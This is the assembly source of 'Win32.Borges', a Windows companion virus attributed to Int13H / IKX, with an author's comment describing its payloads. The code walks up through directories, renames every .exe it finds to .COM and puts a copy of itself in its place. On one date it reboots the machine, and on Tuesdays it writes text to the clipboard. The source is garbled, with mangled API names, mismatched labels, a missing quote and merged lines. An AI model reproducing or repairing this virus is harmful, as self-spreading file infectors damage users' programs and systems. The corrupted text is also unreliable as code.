; ----------------> Win32.Borges Virus by Int13H / IKX <-----------------;
IT Mirrores Exes Files, NAVEGATES DIRECTORIES with THE FAMOUS Dot-Dot;
, Method, on September 19 Reboots The Machine; on Tuesdays Puts a Text;
In The Clipboard. This Beast Works Using API for All ITS Operations ,;
NO DIRTY TRICKS Are Used. Just to Mantain Compatibility :);
Dedicated to Jorge Luis Borges, Because The First Tale of His Book
Named "The Book of Sand" IS Called "The Other", And It Speaks About;
An Encounter with a younger copy of himself. The family doppelganger .;
; - - - - - - - - - - - - - - - - - - -.
;;
;
Tasm32 / ml / m3 borges.asm,
TLINK32 / TPE / AA / C / V borges.obj ,, import32.lib,
;
.386
.MODEL FLAT
Locals
EXTRN FINDFIRSTFILEA: PROC
EXTRN FINDNEXTFILEA: PROC
EXTRN SETCURRENTDIRECTORYA: PROC
EXTRN GETCURRENTDIRECTORYA: PROC
EXTRN GETSYSTEMTIME: Proc
EXTRN MOVEFILEA: PROC
EXTRN COPYFILEA: PROC
EXTRN GLOBALLOC: PROC
EXTRN GLOBAllock: Proc
Extrn GlobalUnlock: Proc
EXTRN OpenClipboard: Proc
EXTRN SETCLIPBOARDDATA: PROC
EXTRN EMPTYCLIPBOARD: PROC
EXTRN CloseClipboard: Proc
EXTRN GETCOMMANDLINEA: PROC
EXTRN CREATEPROCESSA: PROC
EXTRN LSTRCPYA: PROC
EXTRN Messageboxa: Proc
EXTRN EXITWINDOWSEX: PROC
EXTRN EXITPROCESS: PROC
.DATA
Tituloventana DB 'Win32.Borges Virus by INT13H / IKX', 0
TextOventana DB 'Made in Paraguay, South America, 0
MemHandle DD 0
Victimas DB '* .exe', 0
Searchandle DD 0
Longitude DD 0
ProcessInfo DD 4 DUP (0)
Startupinfo DD 4 DUP (0)
Win32FindData DD 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
HALLADO DB 200 DUP (0)
CREAR DB 200 DUP (0)
ParacorRer DB 200 DUP (0)
Original DB 200 DUP (0)
Actual DB 200 DUP (0) Puntopunto DB '..', 0
SystemTimeStruc DW 0, 0, 0, 0, 0, 0, 0, 0
.Code
Borges: MOV Eax, Offset SystemTimeStruc
Push EAX
Call getSystemTime
MOV AX, Word Ptr Offset [SystemTimeStruc 2]
CMP AL, 9
JNE NOFQVBIRTHDAY
MOV AX, Word Ptr Offset [SystemTimeStruc 6]
CMP Al, 17
Je Adios
NofqvbirtHday:
Push offset Original
Push 000000C8H
Call getcurrentdirectorya
Mov DWORD PTR [longitude], EAX
Call getcommandlinea
Push EAX
Push Offset ParaCorro
Call lstrcpya
Mov Edi, EAX
Buscar: CMP BYTE PTR [EDI], '.'
JZ Elpunto
Inc EDI
JMP buscar
Elpunto: MOV ESI, EDI
Inc ESI
Add Edi, 4
MOV Byte Ptr [EDI], 00
Carrousell:
Call InfectDirectory
Push Offset Puntopunto
Call setCurrentDirectorya
Push Offset Actual
Push 000000C8H
Call getcurrentdirectorya
CMP EAX, DWORD PTR [longitude]
Je Salida
Mov DWORD PTR [longitude], EAX
JMP Carrousell
InfectDirectory:
Push Offset Win32Finddata
Push Offset Victimas
Call FindfirstFilea
Mov DWORD PTR [Searchandle], EAX
CICLO: CMP EAX, -1
Je Salida
OR EAX, EAX
Jnz Continuar
RET
Continuar:
Push Offset Hallado
Push Offset Crear
Call lstrcpya
Mov Edi, Offset Crear
Seguirbuscando:
CMP BYTE PTR [EDI], '.'
JZ PuntoenContrado
Inc EDI
JMP Seguirbuscando
PuntoenContrado:
Inc EDI
MOV DWORD PTR [EDI], 0004D4F43H
Push Offset Crear
Push Offset Hallado
Call Movefilea
PUSH 0
Push Offset Hallado
Push Offset ParaCorR 1
Call Copyfilea
Push Offset Win32Finddata
Push DWORD PTR [Searchandle]
Call FindnextFilea
JMP CICLO
Fillclipboard:
PUSH 0
Call OpenClipboard
Call EmptyClipboard
Push (Offset Textoventana-Offset Tituloventana)
Push 00000002; GMEM_MOVEABLE
Call GlobalLococ
Push EAX
Mov DWORD PTR [MemHandle], EAX
Call GlobalLock
Push Eaxpush Offset Tituloventana
Push EAX
Call lstrcpya
Call Globalunlock
Push dword PTR [MemHandle]
Push 00000001; CF_Text
Call setClipboardData
Call CloseClipboard
JMP Run4Thenight
Adios: push 00000001
Push Offset Tituloventana
Push Offset TextOventana
PUSH 0
Call Messageboxa
PUSH 0
Push 00000002; EWX_REBOOT
Call exitwindowsex
Salida: push offset Original
Call setCurrentDirectorya
MOV AX, Word Ptr Offset [SystemTimeStruc 4]
CMP AL, 2
Je FillClipboard
Run4thenight:
Push Offset ProcessInfo
Push Offset StartupInfo
Sub Eax, EAX
Push EAX
Push EAX
Push 00000010h
Push EAX
Push EAX
Push EAX
Call getcommandlinea
INC EAX
Push EAX
DONE: MOV DWORD PTR [ESI], 0004D4F43H
Push Offset ParaCorR 1
Call CreateProcessa
PUSH 0
Call EXITPROCESS
ENDS
End borges
